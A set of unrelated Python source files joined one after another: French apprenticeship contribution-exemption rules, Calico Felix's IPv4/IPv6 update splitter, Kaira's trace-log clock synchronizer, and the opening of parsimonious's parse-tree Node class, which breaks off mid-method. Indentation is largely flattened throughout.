# Autres entreprises
#
# - exonération totale (part patronale et salariale) des cotisations de sécurité sociale
# (maladie-veuvage-vieillesse) et d'allocations familiales,
# - exonération des autres cotisations sociales salariales,
# - restent donc dues par l'employeur : les cotisations supplémentaires d'accidents du travail, la part patronale
# des cotisations d'accidents du travail et de maladies professionnelles, de retraite complémentaire, d'assurance
# chômage et d'AGFF, le versement transport ainsi que les cotisations Fnal.
# Précision : le décompte de l'effectif des entreprises non artisanales s'apprécie au 31 décembre précédant la date
# de conclusion du contrat d'apprentissage.
def function(self, simulation, period):
period = period.this_month
accident_du_travail = simulation.calculate('accident_du_travail', period)
apprenti = simulation.calculate('apprenti', period)
cotisations_employeur = simulation.calculate('cotisations_employeur', period)
effectif_entreprise = simulation.calculate('effectif_entreprise', period)
famille = simulation.calculate('famille', period)
mmid_employeur = simulation.calculate('mmid_employeur', period)
vieillesse_deplafonnee_employeur = simulation.calculate('vieillesse_deplafonnee_employeur', period)
vieillesse_plafonnee_employeur = simulation.calculate('vieillesse_plafonnee_employeur', period)
cotisations_non_exonerees = accident_du_travail
exoneration_moins_11 = cotisations_non_exonerees - cotisations_employeur
cotisations_exonerees = (famille + mmid_employeur + vieillesse_plafonnee_employeur +
vieillesse_deplafonnee_employeur)
exoneration_plus_11 = -cotisations_exonerees
return period, (
exoneration_plus_11 * (effectif_entreprise >= 11) +
exoneration_moins_11 * (effectif_entreprise < 11)
) * apprenti
class exoneration_cotisations_salariales_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Exonération de cotisations salariales pour l'emploi d'un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
def function(self, simulation, period):
period = period.this_month
apprenti = simulation.calculate('apprenti', period)
cotisations_salariales_contributives = simulation.calculate('cotisations_salariales_contributives', period)
cotisations_salariales_non_contributives = simulation.calculate(
'cotisations_salariales_non_contributives', period)
return period, - (cotisations_salariales_contributives + cotisations_salariales_non_contributives) * apprenti
class prime_apprentissage(Variable):
column = FloatCol
entity_class = Individus
label = u"Prime d'apprentissage pour les entreprise employant un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# L'employeur peut également recevoir de la région dans laquelle est situé l'établissement du lieu de travail,
# une prime d'apprentissage.
#
# Les conditions d'attribution de cette aide sont fixées par chaque région (ou pour la Corse, par la collectivité
# territoriale de Corse) après avis du comité de coordination régional de l'emploi et de la formation
# professionnelle en tenant compte notamment de l'ensemble de l'effort de l'employeur dans le domaine de
# l'apprentissage, de la durée de la formation et des objectifs de développement de la formation professionnelle
# des jeunes sur le territoire de la région (ou de la collectivité territoriale de Corse).
#
# Son montant est au minimum de 1 000 euros par année de cycle de formation.
# nouveau. Depuis le 1er janvier 2014 , cette aide n'est versée qu'aux entreprises de moins de 11 salariés.
#
# Son versement est subordonné à la condition que l'embauche de l'apprenti soit confirmée à l'issue des deux
# premiers mois de l'apprentissage.
#
# Son versement cesse lorsque l'apprenti n'est plus salarié dans l'entreprise ou l'établissement qui l'a embauché.
def function(self, simulation, period):
period = period.this_year
apprenti = simulation.calculate('apprenti', period)
return period, 1000 * apprenti
# # class credit_impot_emploi_apprenti(Variable):
# column = FloatCol
# entity_class = Individus
# label = u" Crédit d'impôt pour l'emploi d'apprentis"
# url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
#
# def function(self, simulation, period):
# pass
# # Cet avantage fiscal est réservé aux entreprises imposées selon un régime d'imposition du réel.
# # Précision : les entreprises exonérées d'impôt sur les bénéfices au titre des entreprises nouvelles, d'une
# # implantation en zone franche urbaine, du statut de jeune entreprise innovante ou d'une implantation en Corse
# # peuvent également en bénéficier.
# #
# # Le crédit d'impôt est égal au nombre moyen d'apprentis dont le contrat de travail a atteint une durée d'au moins
# # 1 mois au cours de l'année civile multiplié par :
# # - 1 600 €,
# # - ou 2 200€ si l'apprenti est reconnu travailleur handicapé et qu'il bénéficie d'un accompagnement personnalisé,
# # ou si l'apprenti est employé par une entreprise portant le label "Entreprise du patrimoine vivant", ou s'il est
# # recruté dans le cadre d'une "formation apprentissage junior".
# #
# # L'avantage fiscal est plafonné au montant des dépenses de personnel afférentes aux apprentis minoré des
# # subventions perçues en contrepartie de leur embauche.
# # class credit_impot_emploi_apprenti(Variable):
# column = FloatCol
# entity_class = Individus
# label = u"Déduction de la créance "bonus alternant"
# Les entreprises de plus de 250 salariés, tous établissements confondus, redevables de la taxe d'apprentissage,
# qui emploient plus de 4 % de jeunes en apprentissage (5 % pour la taxe payable en 2016 au titre de 2015), dans la
# limite de 6 % d'alternants, peuvent bénéficier d'une créance à déduire du hors quota de la taxe d'apprentissage (TA).
# Les entreprises concernées doivent calculer elles-mêmes le montant de la créance à déduire de leur TA.
# Son montant est calculé selon la formule suivante : pourcentage d'alternants ouvrant droit à l'aide x effectif annuel
# moyen de l'entreprise au 31 décembre de l'année précédente x un montant forfaitaire de 400 € par alternant.
# Par exemple, une entreprise de 300 salariés employant 6 % de salariés en alternance, ce qui porte le nombre
# d'alternants ouvrant droit à l'aide à 2 % (6 % - 4 %), peut bénéficier d'une prime de : 2 % x 300 x 400 = 2 400 €.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Metaswitch Networks
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
felix.splitter
~~~~~~~~~~~~~
Simple object that just splits notifications out for IPv4 and IPv6.
"""
import functools
import logging
import gevent
from calico.felix.actor import Actor, actor_message
_log = logging.getLogger(__name__)
class UpdateSplitter(Actor):
"""
Actor that takes the role of message broker, farming updates out to IPv4
and IPv6-specific actors.
Users of the API should follow this contract:
(1) send an apply_snapshot message containing a complete and consistent
snapshot of the data model.
(2) send in-order updates via the on_xyz_update messages.
(3) at any point, repeat from (1)
"""
def __init__(self, config, ipsets_mgrs, rules_managers, endpoint_managers,
iptables_updaters, ipv4_masq_manager):
super(UpdateSplitter, self).__init__()
self.config = config
self.ipsets_mgrs = ipsets_mgrs
self.iptables_updaters = iptables_updaters
self.rules_mgrs = rules_managers
self.endpoint_mgrs = endpoint_managers
self.ipv4_masq_manager = ipv4_masq_manager
self._cleanup_scheduled = False
@actor_message()
def apply_snapshot(self, rules_by_prof_id, tags_by_prof_id,
endpoints_by_id, ipv4_pools_by_id):
"""
Replaces the whole cache state with the input. Applies deltas vs the
current active state.
:param rules_by_prof_id: A dict mapping security profile ID to a list
of profile rules, each of which is a dict.
:param tags_by_prof_id: A dict mapping security profile ID to a list of
profile tags.
:param endpoints_by_id: A dict mapping EndpointId objects to endpoint
data dicts.
:param ipv4_pools_by_id: A dict mapping IPAM pool ID to dicts
representing the pool.
"""
# Step 1: fire in data update events to the profile and tag managers
# so they can build their indexes before we activate anything.
_log.info("Applying snapshot. Queueing rules.")
for rules_mgr in self.rules_mgrs:
rules_mgr.apply_snapshot(rules_by_prof_id, async=True)
_log.info("Applying snapshot. Queueing tags/endpoints to ipset mgr.")
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.apply_snapshot(tags_by_prof_id, endpoints_by_id,
async=True)
# Step 2: fire in update events into the endpoint manager, which will
# recursively trigger activation of profiles and tags.
_log.info("Applying snapshot. Queueing endpoints->endpoint mgr.")
for ep_mgr in self.endpoint_mgrs:
ep_mgr.apply_snapshot(endpoints_by_id, async=True)
# Step 3: send update to NAT manager.
_log.info("Applying snapshot. Queueing IPv4 pools -> masq mgr.")
self.ipv4_masq_manager.apply_snapshot(ipv4_pools_by_id, async=True)
_log.info("Applying snapshot. DONE. %s rules, %s tags, "
"%s endpoints, %s pools", len(rules_by_prof_id),
len(tags_by_prof_id), len(endpoints_by_id),
len(ipv4_pools_by_id))
# Since we don't wait for all the above processing to finish, set a
# timer to clean up orphaned ipsets and tables later. If the snapshot
# takes longer than this timer to apply then we might do the cleanup
# before the snapshot is finished. That would cause dropped packets
# until applying the snapshot finishes.
if not self._cleanup_scheduled:
_log.info("No cleanup scheduled, scheduling one.")
gevent.spawn_later(self.config.STARTUP_CLEANUP_DELAY,
functools.partial(self.trigger_cleanup,
async=True))
self._cleanup_scheduled = True
@actor_message()
def trigger_cleanup(self):
"""
Called from a separate greenlet, asks the managers to clean up
unused ipsets and iptables.
"""
self._cleanup_scheduled = False
_log.info("Triggering a cleanup of orphaned ipsets/chains")
# Need to clean up iptables first because they reference ipsets
# and force them to stay alive.
for ipt_updater in self.iptables_updaters:
ipt_updater.cleanup(async=False)
# It's still worth a try to clean up any ipsets that we can.
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.cleanup(async=False)
@actor_message()
def on_rules_update(self, profile_id, rules):
"""
Process an update to the rules of the given profile.
:param str profile_id: Profile ID in question
:param dict[str,list[dict]] rules: New set of inbound/outbound rules
or None if the rules have been deleted.
"""
_log.info("Profile update: %s", profile_id)
for rules_mgr in self.rules_mgrs:
rules_mgr.on_rules_update(profile_id, rules, async=True)
@actor_message()
def on_tags_update(self, profile_id, tags):
"""
Called when the given tag list has changed or been deleted.
:param str profile_id: Profile ID in question
:param list[str] tags: List of tags for the given profile or None if
deleted.
"""
_log.info("Tags for profile %s updated", profile_id)
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.on_tags_update(profile_id, tags, async=True)
@actor_message()
def on_interface_update(self, name):
"""
Called when an interface state has changed.
:param str name: Interface name
"""
_log.info("Interface %s state changed", name)
for endpoint_mgr in self.endpoint_mgrs:
endpoint_mgr.on_interface_update(name, async=True)
@actor_message()
def on_endpoint_update(self, endpoint_id, endpoint):
"""
Process an update to the given endpoint. endpoint may be None if
the endpoint was deleted.
:param EndpointId endpoint_id: EndpointId object in question
:param dict endpoint: Endpoint data dict
"""
_log.info("Endpoint update for %s.", endpoint_id)
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.on_endpoint_update(endpoint_id, endpoint, async=True)
for endpoint_mgr in self.endpoint_mgrs:
endpoint_mgr.on_endpoint_update(endpoint_id, endpoint, async=True)
@actor_message()
def on_ipam_pool_update(self, pool_id, pool):
_log.info("IPAM pool %s updated", pool_id)
self.ipv4_masq_manager.on_ipam_pool_updated(pool_id, pool, async=True)
|
#
# Copyright (C) 2015-2016 Tomas Panoc
#
# This file is part of Kaira.
#
# Kaira is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Kaira is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kaira. If not, see <http://www.gnu.org/licenses/>.
#
import xml.etree.ElementTree as xml
import loader
from runinstance import RunInstance
from tracelog import TraceLog, Trace
from Queue import Queue
from collections import OrderedDict
from cStringIO import StringIO
class SyncedTraceLog (TraceLog):
""" SyncedTraceLog -- synchronizes timestamps within a Kaira tracelog
(*.kth), removes the clock condition violations
"""
def __init__(self, **kwargs):
""" Creates new SyncedTraceLog object, different method is used
according to the passed keyword.
Key: 'fromtracelog' -> Value:
Tuple(
a path to a tracelog file (*.kth),
settings tuple( min_event_diff, min_msg_delay,
forward_amort, backward_amort,
weak_sync )
)
min_event_diff -- Minimal difference between 2 events
in a process (nanoseconds)
min_msg_delay -- Minimum message delay of messages from
one process to another (nanoseconds)
forward_amort -- True/False, turns on/off forward amortization
feature
backward_amort -- True/False, turns on/off backward
amortization feature
weak_sync -- True/False, turns on/off initial weak synchronization
Creates a new SyncedTraceLog object from an existing TraceLog
object and does the synchronization
Key: 'fromfile' -> Value: A path to a *.kst
Loads an existing already synchronized *.kst file
"""
if "fromtracelog" in kwargs:
TraceLog.__init__(self, kwargs["fromtracelog"][0], False, True, False)
self._syncing = True
self._from_tracelog(kwargs["fromtracelog"][1])
elif "fromfile" in kwargs:
TraceLog.__init__(self, kwargs["fromfile"][0], False, False)
self._syncing = False
self._from_file(kwargs["fromfile"])
else:
raise Exception("Unknown keyword argument!")
def _from_tracelog(self, settings):
# Matrix of unprocessed sent messages
self.messages = [[SQueue() for x in range(self.process_count)] for x in range(self.process_count)]
self.minimal_event_diff = settings[0]
self.minimum_msg_delay = settings[1]
self.forward_amort = settings[2]
self.backward_amort = settings[3]
self.weak_sync = settings[4]
self.straces = []
messenger = Messenger(self)
for t in self.traces:
strace = SyncedTrace(t.data, t.process_id, self.pointer_size, \
self.minimal_event_diff, \
self.minimum_msg_delay, \
self.forward_amort, \
self.backward_amort, \
self.messages, \
messenger)
self.straces.append(strace)
self.traces = self.straces
self._synchronize()
def _from_file(self, filename):
self.process_count, self.pointer_size, self.traces, self.project = \
SyncedTraceLogLoader(filename).load()
self.filename = filename
self.export_data = True
self.first_runinstance = RunInstance(self.project, self.process_count)
self._preprocess(False)
def _synchronize(self):
""" Main feature of this class. It controls whole synchronization
procedure
"""
# Apply initial weak synchronization
if self.weak_sync:
maxspawntrace = max( self.traces, key=lambda x: x.get_next_event_time() )
for trace in self.traces:
trace.time_offset = maxspawntrace.get_next_event_time() - trace.get_next_event_time()
trace.set_init_time(maxspawntrace.get_init_time())
# Make an init time of the process with the lowest init time reference
# time for all events from all processes
else:
starttime = min([ trace.get_init_time() for trace in self.traces ])
for trace in self.traces:
trace.time_offset = trace.get_init_time() - starttime
trace.set_init_time(trace.time_offset)
# List of unprocessed processes
processes = [x for x in range(self.process_count)]
# A process which will be processed
current_p = processes[0]
# Control mechanism goes through every event of a process,
# it jumps to another process if a send event of reached receive event
# is found to be unprocessed or if the end of process is reached
while processes:
working_p = current_p
trace = self.traces[working_p]
while working_p == current_p:
if trace.get_next_event_time() is not None:
if trace.get_next_event_name() == "Recv ":
sender = trace.get_msg_sender()
if self.messages[sender][current_p].empty() is False:
trace.process_event()
if self.backward_amort:
#Backward amortization - add receive time and maximum offset
self.traces[sender].refill_received_time(trace.get_last_received_sent_time(),\
trace.get_last_receive_event_time(),\
working_p)
else:
current_p = sender
else:
trace.process_event()
else:
processes.remove(current_p)
#List is empty, stops the loop
if not processes:
current_p += 1
else:
current_p = processes[0]
for trace in self.traces:
trace.finalize()
def refill_received_time(self, target, send_time, receive_time, receiver, \
new_record=True):
""" Pairs a received time with the corresponding sent time and computes
maximum offset. Works only if the backward amortization is turned
on.
Arguments:
target -- ID of a process whose data should be refilled
send_time -- time of a corresponding send event
receive_time -- time of a receipt of the msg to be filled
new_record -- if True you are adding missing received time otherwise \
you are updating an existing received time
"""
if self._syncing:
self.traces[target].refill_received_time(send_time, receive_time, \
receiver, new_record)
def export_to_file(self, filename):
""" Saves synchronized tracelog to a file
Arguments:
filename -- Path to a *.kst
"""
data = str(self.pointer_size) + '\n' + str(self.process_count) + '\n'
traces = ""
for t in self.traces:
tdata = t.export_data()
data += str(len(tdata)) + '\n'
traces += tdata
data += traces
with open(self.filename, "r") as f:
f.readline()
data += f.read()
with open(filename, "wb") as f:
f.write(data)
class SyncedTraceLogLoader(object):
""" Performs loading of a *.kst file """
def __init__(self, filename):
""" Initialization.
Arguments:
filename -- path to a *.kst file
"""
self._filename = filename
self._loaded = False
def load(self):
""" Loads content of *.kst.
Returns tuple (number of processes, pointer size, list of traces'
binary data, XML description of program/project)
"""
if not self._loaded:
self.pointer_size = 0
self.traces = []
self.project = None
with open(self._filename, "rb") as f:
self.pointer_size = int(f.readline())
self.process_count = int(f.readline())
i = 0
processes_length = []
while i < self.process_count:
processes_length.append(int(f.readline()))
i += 1
i = 0
for p in processes_length:
trace = Trace(f.read(p), i, self.pointer_size)
self.traces.append(trace)
i += 1
x = xml.fromstring(f.read())
self.project = loader.load_project_from_xml(x, "")
self._loaded = True
return (self.process_count, self.pointer_size, self.traces,
self.project)
class SyncedTrace(Trace):
""" Synchronizes timestamps of events within one process. """
def __init__(self, data, process_id, pointer_size, minimal_event_diff, \
minimum_msg_delay, \
forward_amort, \
backward_amort, \
messages, \
messenger):
""" Synchronizes timestamps of events within one process.
Arguments:
data -- content of a process's *.ktt file
process_id -- ID of the process
pointer_size -- 4 or 8, type of binary data within the *.ktt file
minimal_event_diff -- see the SyncedTraceLog class
minimum_msg_delay -- see the SyncedTraceLog class
forward_amort -- see the SyncedTraceLog class
backward_amort -- see the SyncedTraceLog class
messages -- shared variable among SyncedTraces, 2-dimensional array
of SQueues, first coordinate is a sender of a message,
second is the recipient, SQueues store sent events.
messenger -- an object of the Messenger class, communicator between
the SyncedTrace and a SyncedTraceLog
"""
Trace.__init__(self, data, process_id, pointer_size)
self._minimal_event_diff = minimal_event_diff
self._minimum_msg_delay = minimum_msg_delay
self._forward_amort = forward_amort
self._backward_amort = backward_amort
self._messages = messages
self._messenger = messenger
self._data_list = []
self._header_info = self.data[:self.pointer]
self._last_event_time = 0
self._send_events = OrderedDict()
self._last_received_sent_time = 0
self._last_refilled_send_time = None
self._last_receive_event_time = 0
self._receive_send_table = {}
self._BA_tasks = []
def _clock_check(self, time, start_pointer, end_pointer=False, \
is_receive=False, sent_time=0):
""" Checks, computes and repairs an event timestamp
Arguments:
time -- a timestamp to be checked
start_pointer -- a pointer value before an event unpacking/reading
end_pointer -- a pointer value after the event unpacking/reading,
if False self.pointer is used
is_receive -- marks synchronization of a receive event
sent_time -- a timestamp of corresponding send event
Returns corrected time.
"""
newtime = 0
if not is_receive:
newtime = self._clock(time + self.time_offset)
else:
newtime = self._clock_receive(time + self.time_offset, sent_time)
# Save time to the data list
self._repair_time(newtime, start_pointer, end_pointer)
return newtime
def _clock(self, time):
""" Computes a new time for a process's internal or send event
Arguments:
time -- the time to be fixed
Returns corrected time.
"""
newtime = 0
if self._last_event_time != 0:
newtime = max([time, self._last_event_time + \
self._minimal_event_diff])
else:
newtime = time
self._last_event_time = newtime
return newtime
def _clock_receive(self, time, sent_time):
""" Computes a new time for a process's receive event
Arguments:
time -- the time to be fixed
sent_time -- time of the corresponding send event
Returns corrected time.
"""
newtime = 0
if self._last_event_time != 0:
newtime = max([sent_time + self._minimum_msg_delay, time, \
self._last_event_time + \
self._minimal_event_diff])
else:
newtime = max([sent_time + self._minimum_msg_delay, time])
if self._forward_amort:
self._forward_amortization(time, newtime)
self._last_event_time = newtime
self._last_receive_event_time = newtime
return newtime
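    # Illustrative worked example (added note, not from the original code):
    # with minimum_msg_delay=10 and minimal_event_diff=1, a receive event
    # logged at time=100 whose matching send was synchronized to sent_time=95,
    # following an event at _last_event_time=99, is moved to
    #   max(95 + 10, 100, 99 + 1) = 105.
    # Forward amortization then adds the 5-tick shift to time_offset so the
    # spacing of the following events is preserved.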
def _forward_amortization(self, origin_time, new_time):
""" Checks shift of a receive event. If a shift exists the time offset
is increased to keep the spacing between two events
(Forward amortization)
Arguments:
            origin_time -- original timestamp of a receive event
new_time -- corrected/synchronized timestamp of the event
"""
if new_time > origin_time:
self.time_offset += new_time - origin_time
def finalize(self):
""" Finalize the synchronization of a trace. This should be called after
the timestamp correction of all traces within a tracelog.
"""
if not self._backward_amort:
return
for task in self._BA_tasks:
self._backward_amortization(task.original, task.time)
def _do_BA(self, newtime, original):
""" Creates a new request (task) for BA and performs all previous tasks
which are ready.
"""
if not self._backward_amort:
return
if self._last_event_time == 0:
return
if newtime <= original:
return
ready = self.are_receive_times_refilled()
self._BA_tasks.append( BATask( newtime, original, ready ) )
for task in self._BA_tasks[ : -1]:
rdy = self.are_receive_times_refilled(task.time)
task.ready = rdy
if rdy:
self._backward_amortization(task.original, task.time)
if ready:
self._backward_amortization(original, newtime)
self._BA_tasks = [task for task in self._BA_tasks if not task.ready]
def _backward_amortization(self, origin_time, new_time):
""" Applies the backward amortization. It expects that received
times for all preceding send events have been filled.
Arguments:
origin_time -- the original timestamp of receive event
new_time -- corrected/synchronized timestamp of the event
"""
offset = new_time - origin_time
send_event_keys = [ key for key in self._send_events.keys() if key > new_time ]
linear_send_events = OrderedDict()
# Pick send events which occurred before the receive event
if send_event_keys:
tmp_point = self._send_events.keys().index(send_event_keys[0])
send_set = self._send_events.keys()[ : tmp_point ]
else:
send_set = self._send_events.keys()
# Linear correction - formation of a set of breakpoints
previous = SendEvent()
delete_events = Queue()
for event in send_set:
se = self._send_events[event]
if len(se) > 1:
index = se.index( min( se, key=lambda x: x.offset ) )
bp = se[index]
else:
bp = se[0]
bp.time = event
linear_send_events[event] = bp
if bp.offset <= previous.offset or previous.offset >= offset:
delete_events.put(previous.time)
previous = bp
if previous.offset >= offset:
delete_events.put(previous.time)
length = delete_events.qsize()
while length > 0:
linear_send_events.pop(delete_events.get(), None)
length -= 1
# Repair times
send_event = [0]
local_offset = offset
# Is there any event that cannot be shifted by full amount of the
# offset?
if linear_send_events:
send_event = linear_send_events.popitem(False)
local_offset = send_event[1].offset
new_send_events = OrderedDict()
for index, event in enumerate(self._data_list):
if event[1] == new_time:
break
if event[0] == "M":
tmp_time = event[1]
time = tmp_time + local_offset
event[1] = time
new_send_events[time] = []
for e in self._send_events[tmp_time]:
e.offset -= local_offset
new_send_events[time].append(e)
self._last_refilled_send_time = time
if tmp_time == send_event[0]:
if linear_send_events:
send_event = linear_send_events.popitem(False)
local_offset = send_event[1].offset
else:
send_event = [0]
local_offset = offset
else:
event[1] += local_offset
if event[0] == "R":
send_time = self._receive_send_table[index].get_sent_time()
origin_id = self._receive_send_table[index].origin_id
self._messenger.refill_received_time(origin_id, send_time, \
event[1], \
self.process_id, \
False)
# Add send events behind the receive event back
for key in send_event_keys:
new_send_events[key] = self._send_events[key]
self._last_refilled_send_time = key
self._send_events = new_send_events
def are_receive_times_refilled(self, received_time=None):
""" Returns True if all send events (SendEvents) in chosen interval
            have had their receive times filled in.
Arguments:
received_time -- time of a receive event which specifies an upper
border for the set of send events that is going
to be checked
"""
times = self._send_events.keys()
if self._last_refilled_send_time is not None:
start = times.index(self._last_refilled_send_time)
times = times[start:]
if received_time is not None:
times = [t for t in times if t < received_time]
for t in times:
for e in self._send_events[t]:
if e.receive == 0:
return False
return True
def refill_received_time(self, sent_time, received_time, receiver, new_record=True):
""" Matches receive time to a specific sent time and computes
maximum offset.
Arguments:
sent_time -- time of the corresponding send event in this trace
received_time -- the receive time
receiver -- ID of a process where the receive event happened
            new_record -- if True a missing received time is added, otherwise
                          an existing received time is updated
"""
for event in self._send_events[sent_time]:
if event.receiver == receiver:
event.receive = received_time
event.offset = received_time - \
self._minimum_msg_delay - sent_time
if new_record:
self._last_refilled_send_time = sent_time
break
def export_data(self):
""" Returns synchronized data in a raw binary form. """
stream = StringIO()
stream.write(self._header_info)
for event in self._data_list:
event[1] = self.struct_basic.pack(event[1])
for data in event:
stream.write(data)
export = stream.getvalue()
stream.close()
return export
def set_init_time(self, increment, direct=False):
""" Increase initial time of a process by the increment
Arguments:
increment -- an integer value which is added to the initial time
            direct -- if True the initial time is set directly to the
                      increment instead of being increased by it
"""
origin = self.info["inittime"]
if direct:
newtime = str(increment)
else:
newtime = str(int(origin) + increment)
self.info["inittime"] = newtime
self._header_info = self._header_info.replace(origin, newtime)
def get_msg_sender(self):
""" Returns None, or the id of a process which is the sender of the
            received message if the next event is a receive event
"""
if self.get_next_event_name() == "Recv ":
tmp_pointer = self.pointer
self.pointer += 1
origin_id = self._read_struct_receive()[1]
self.pointer = tmp_pointer
return origin_id
else:
return None
def get_last_received_sent_time(self):
""" Returns last received (obtained from messages) sent time. """
return self._last_received_sent_time
def get_last_receive_event_time(self):
""" Returns time of last synchronized receive event. """
return self._last_receive_event_time
def _repair_time(self, time, start_pointer, end_pointer):
""" Overwrites original time in tracelog's data string with the new one
Arguments:
time -- a new time to be saved
start_pointer -- points to the start of event's data
end_pointer -- points to the end of event ('s data)
"""
event = self._data_list[-1]
event.append(time)
start_pointer += self.struct_basic.size
if end_pointer is False:
end_pointer = self.pointer
event.append( self.data[ start_pointer : end_pointer ] )
def _extra_time(self, time, pointer, receive=False, origin_id=None):
""" Calls functions for time synchronization
Arguments:
time -- time to be synchronized
pointer -- points to the start of event's data
receive -- set True if you want to synchronize receive event
origin_id -- if receive is True, specify id of the sender
"""
if not receive:
return self._clock_check(time, pointer)
else:
if origin_id is None:
raise Exception("Origin_id for a receive event not entered!")
send_event = self._messages[origin_id][self.process_id].get()
sent_time = send_event[1]
self._receive_send_table[ len(self._data_list) - 1 ] = RSTableElement(send_event, origin_id)
tmp_original_time = time + self.time_offset
ctime = self._clock_check(time, pointer, False, True, sent_time)
self._do_BA(ctime, tmp_original_time)
self._last_received_sent_time = sent_time
return ctime
def _extra_event_send(self, time, target_id):
""" Adds send event to the message queue and to trace's list of sends
Arguments:
time -- already synchronized time of the send event
target_id -- message recipient
"""
self._messages[self.process_id][target_id].put(self._data_list[-1])
send_event = SendEvent()
send_event.receiver = target_id
if time not in self._send_events.keys():
self._send_events[time] = [send_event]
else:
self._send_events[time].append(send_event)
def _extra_event(self, event):
""" Stores event symbol into trace's data """
self._data_list.append([event])
def _extra_value(self):
""" Retrieves record of the last processed event """
return self._data_list[-1]
def _extra_tokens_add(self, pointer, extra, values):
""" Stores additional event's data. """
if values:
extra.append(self.data[pointer:self.pointer])
class SQueue(Queue):
""" Classic Queue with possibility of reading an element instead of popping """
def __init__(self):
Queue.__init__(self)
def get_and_keep(self):
""" Returns an element prepared for popping. """
value = self.get()
self.queue.appendleft(value)
return value
class Messenger(object):
""" Connector between SyncedTraceLog and SyncedTrace """
def __init__(self, target):
""" Initialization.
Arguments:
target -- Reference to SyncedTraceLog
"""
self._target = target
def refill_received_time(self, target, send_time, receive_time, receiver, \
new_record=True):
""" Pairs a receive time to the corresponding sent time and computes
maximum offset. Works only if the backward amortization is turned
on.
Arguments:
target -- ID of a process whose data should be refilled
send_time -- time of a corresponding send event
receive_time -- time of a receipt of the msg to be filled
            receiver -- ID of the process where the receive event happened
            new_record -- if True a missing receive time is added, otherwise
                          an existing receive time is updated
"""
self._target.refill_received_time(target, send_time, receive_time, \
receiver, new_record)
class SendEvent(object):
""" Send event structure.
Attributes:
time -- sent time
receive -- received time
receiver -- a recipient of the message
offset -- difference between received and sent time
"""
def __init__(self):
self.time = 0
self.receive = 0
self.receiver = None
self.offset = 0
class RSTableElement(object):
""" Reference to a send event """
def __init__(self, send_event, origin_id):
""" Initialization.
Arguments:
send_event -- reference to a send event
origin_id -- ID of the message sender
"""
self.send_event = send_event
self.origin_id = origin_id
def get_sent_time(self):
""" Returns time of sent event """
return self.send_event[1]
class BATask(object):
""" Task for Backward Amortization
Represents a receive event which causes BA
"""
def __init__(self, receive_time, original_time, ready):
""" Initialization
Arguments:
receive_time -- corrected/synchronized timestamp of receive event
original_time -- original timestamp of receive event
ready -- True/False - marks whether all preceding send events were
matched to their corresponding receive events
"""
self.time = receive_time
self.original = original_time
self.ready = ready
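
# --- Illustrative usage sketch (added; not part of the original module) ---
# A minimal demonstration of SQueue.get_and_keep(): the front element can be
# read without being removed, unlike a plain Queue.get().
if __name__ == "__main__":
    _demo = SQueue()
    _demo.put("send-event-1")
    _demo.put("send-event-2")
    assert _demo.get_and_keep() == "send-event-1"  # peeked, still queued
    assert _demo.get() == "send-event-1"
    assert _demo.get() == "send-event-2"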
|
"""Nodes that make up parse trees
Parsing spits out a tree of these, which you can then tell to walk itself and
spit out a useful value. Or you can walk it yourself; the structural attributes
are public.
"""
# TODO: If this is slow, think about using cElementTree or something.
from inspect import isfunction
from sys import version_info, exc_info
from parsimonious.exceptions import VisitationError, UndefinedLabel
from parsimonious.utils import StrAndRepr
from six import (reraise, python_2_unicode_compatible, with_metaclass,
                 iteritems)
@python_2_unicode_compatible
class Node(StrAndRepr):
"""A parse tree node
Consider these immutable once constructed. As a side effect of a
memory-saving strategy in the cache, multiple references to a single
``Node`` might be returned in a single parse tree. So, if you start
messing with one, you'll see surprising parallel changes pop up elsewhere.
My philosophy is that parse trees (and their nodes) should be
representation-agnostic. That is, they shouldn't get all mixed up with what
the final rendered form of a wiki page (or the intermediate representation
of a programming language, or whatever) is going to be: you should be able
to parse once and render several representations from the tree, one after
another.
"""
# I tried making this subclass list, but it got ugly. I had to construct
# invalid ones and patch them up later, and there were other problems.
__slots__ = ['expr_name', # The name of the expression that generated me
'full_text', # The full text fed to the parser
'start', # The position in the text where that expr started matching
                 'end',       # The position after start where the expr first didn't
# match. [start:end] follow Python slice conventions.
'children'] # List of child parse tree nodes
def __init__(self, expr_name, full_text, start, end, children=None):
self.expr_name = expr_name
self.full_text = full_text
self.start = start
self.end = end
self.children = children or []
def __iter__(self):
"""Support looping over my children and doing tuple unpacks on me.
It can be very handy to unpack nodes in arg lists; see
:class:`PegVisitor` for an example.
"""
return iter(self.children)
@property
def text(self):
"""Return the text this node matched."""
return self.full_text[self.start:self.end]
# From here down is just stuff for testing and debugging.
def prettily(self, error=None):
"""Return a unicode, pretty-printed representation of me.
:arg error: The node to highlight because an error occurred there
"""
# TODO: If a Node appears multiple times in the tree, we'll point to
# them all. Whoops.
def indent(text):
return '\n'.join((' ' + line) for line in text.splitlines())
ret = [u'<%s%s matching "%s">%s' % (
self.__class__.__name__,
(' called "%s"' % self.expr_name) if self.expr_name else '',
self.text,
' <-- *** We were here. ***' if error is self else '')]
for n in self:
ret.append(indent(n.prettily(error=error)))
return '\n'.join(ret)
def __str__(self):
"""Return a compact, human-readable representation of me."""
return self.prettily()
def __eq__(self, other):
"""Support by-value deep comparison with other nodes for testing."""
return (other is not None and
self.expr_name == other.expr_name and
self.full_text == other.full_text and
self.start == other.start and
